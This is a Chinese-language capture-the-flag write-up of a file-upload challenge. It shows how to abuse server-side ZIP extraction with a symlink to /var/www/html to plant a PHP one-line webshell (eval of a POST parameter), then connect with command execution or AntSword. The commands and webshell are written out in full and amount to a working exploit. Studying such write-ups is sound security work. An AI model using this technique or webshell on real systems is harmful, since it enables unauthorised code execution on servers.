我们先打开题目链接
是一个文件上传的题目,我们先尝试了几种简单的上传,但是页面似乎没有什么变动
直到我们传了zip形式的页面才有变化
上传之后
-
检查文件的MIME类型。如果上传的文件是ZIP文
件(MIME类型为application/zip),则将其解压缩到
服务器的/tmp目录,并且覆盖原文件。
-
这里限制为zip形式,我们后面上传的就要是zip形式了
解压操作可以覆盖上一次解压文件就可以造成任意文件上传漏洞
师傅们解法是用软连接进行目录穿越
软连接是linux中一个常用命令, 它的功能是为某一个
文件在另外一个位置建立一个同步的链接,这就有点像Windows下快捷方式
虚拟机下 这里先生成目标文件
ln -s /var/www/html test
先压缩成为第一个压缩包
zip -y test1.zip test
删除文件夹
rm -rf test
mkdir是make directory的缩写,Linux中 mkdir 命令用来创建指定的名称的目录
mkdir test
打开test
cd test
开始写马
echo '<?php eval($_POST[1]);?>' >a.php
退出test
cd ..
第二个压缩包
-
zip -q -r test2.zip test
-
使用zip来将文件夹test压缩为test2.zip
-r代表 recursive,代表递归处理,将指定目录下的所有文件和子目录一并处理
-q代表 quiet,代表无声模式,不输出压缩时的具体细节。
上传成功之后,命令执行或者蚁剑连接